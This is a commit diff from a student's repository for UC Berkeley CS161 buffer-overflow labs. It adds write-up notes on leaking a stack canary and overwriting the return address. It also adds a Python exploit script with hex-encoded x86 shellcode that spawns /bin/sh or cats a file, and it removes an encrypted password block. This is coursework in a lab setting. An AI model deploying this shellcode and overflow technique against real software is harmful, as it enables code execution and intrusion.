Skip to content
Snippets Groups Projects
Unverified Commit a29af5fc authored by Recolic Keghart's avatar Recolic Keghart
Browse files

fucking documents

parent 29898fdf
No related branches found
No related tags found
No related merge requests found
# cs161
ucb cs161 labs
Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
......@@ -7,33 +8,9 @@ Course website: http://www-inst.eecs.berkeley.edu/~cs161/sp19/
https://acropolis.cs.berkeley.edu/~account/webacct/
Account: cs164-ace
Password:
```
-----BEGIN PGP MESSAGE-----
hQIMA6EZKPzHVYaOAQ/+JCpketz1mF7XNV63fhDfF2PYHLU4HoDjA63gRyBnhj2h
CRVxVF6gRpQhO7yV6YGUEX+w3wIfusRlTml2OAKSmV1dYUtFsP+jvrpac9CmWVhs
UmB1PR0+YaVZZOIUASuj7cCCPkulUccVWhMGc3soB86hnRj/1zJAGTwIZE5l2x7m
+xzOGSK8wg42j1a69J5bkZ7gIyzRd/9RYePrbvttvDhELeJeWZiTG/hhL4i1wrWA
KdR+N0FzwUMNpa5WiHgZhkXOmfVOVcIJBiS7M7c03NTXocqpM8T/3JfwyrGd99Nh
M7fiwBGpITzGyxPmy/2YIOuCw+EodLTqPNKzwof7VuWh832r8YpwLqeRxFvSdvEJ
fvMAyqV8CzwB3VNzUDTULd6MMyHZI3nThP9WZPegkjBgLF0ucD30Q63wNRvAd6po
VVOEepzrAfEtX0ek/me88cRRceBZIhFx1CQMDKZB0blgu59eqGNEtVEs9tck13kl
qo5ZP6W+SMoCs2RJipVgKP3MnKBFMSj0GuzewSpYpm2XAjK7TS3lLGmlps0+Ok6r
Ciley/Ns3c7miMcKYn+EVPoZ1J59RWbnxN8xpPoScafryAFYMeGLqtqerAVuj4tv
5zpixrE3iqwt+3nL4hKdzmwUHywhAJvPclIwUxT9SqY5sFS8ZH5xheO4N1v97SLS
tgE6esur88tbMaTY8oUOQ3NJ9uFAmrOs9IewRptTZwIQksEzJhjnMegdCm3MPbGX
6hM/ukIMgA77zzwDiJcZB00NTjk0pFCmdpqVpa2bRYPvDRmIgifIbdsPTtaMNp9j
YVfeaoGUpN+YWPy/08gpz7/dCl+dMCjzx/5ZXQy1mc8lIu/f9Wh7kJJ8G7cN6CC9
3TK4iuR3wZ6HbH3R+cljhtgMfOcutTWdrEB+erR4J+setOfWihXs
=tuDB
-----END PGP MESSAGE-----
```
to change the password: `ssh update.cs.berkeley.edu`
Account: cs161-atw
To change the password: `ssh update.cs.berkeley.edu`
proj1/161-proj1-5.png

656 KiB

......@@ -223,6 +223,11 @@ with open('/dev/fd/1','wb') as f:
## 4
The solution is easy. Since BUFLEN=16, I send `0123456789ab\x`, then dehexify skips the `\0` and prints everything in canary area.
Now I construct a message with 16 junk characters to fill the buffer, correct canary, another 8 characters to shift ebp & other staffes, and the return address, then the shellcode.
## 5
- motivation
......@@ -266,8 +271,22 @@ However, we need a fixed-address writable page to put `%ebp`. The page `0x080480
Please see the image below. The procedure is too complicated to explain.
![Please contact root@recolic.net if you can not view this image](https://dl.recolic.net/res/161-proj1-5.png)
Because I have 40 bytes ahead for payload, I can put a shellcode to launch /bin/sh directly. But if I want to create tcp server, I have to write a simple payload and jmp to `&buf+68`. The simple payload is attached below.
```
// get current addr
call foo
foo:
pop %eax
// 40 + 4+4+4+4+4+4+4 - 5
add $63, %eax
jmp *%eax
```
I put 5 `nop` at `&buf+68` to make it work even if I have made a mistake.
......@@ -47,17 +47,19 @@ canary = reply_canary
fill2 = "\0"*8
retaddr = fuck_raddr("bffffaf4") # "bffffaf4"
#payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f2f6c73682f62696e545b505389e131d2b00bcd800a", False) # SHELLCODE
# This payload works! It cat README to stdout. Uncomment print(p.recvline()) to use it.
payload = fuck_raddr("6a3158cd8089c389c16a4658cd8031c050682f636174682f62696e545b506841444d45682f2f524568652f6a7a682f686f6d545950515389e131d2b00bcd80", False) # SHELLCODE
#payload = SHELLCODE
# This payload also works! It cat README to stderr.
payload = SHELLCODE + '\0'
msg = fill1 + canary + fill2 + retaddr + payload + '\n'
#print(msg)
p.send(msg)
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
print(p.recvline())
#print(p.recvline())
#print(p.recvline())
#print(p.recvline())
#print(p.recvline())
##print(p.recvline())
# HINT: the last line of your exploit should look something like:
# p.send('A' * m + canary + 'B' * n + rip + SHELLCODE + '\n')
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment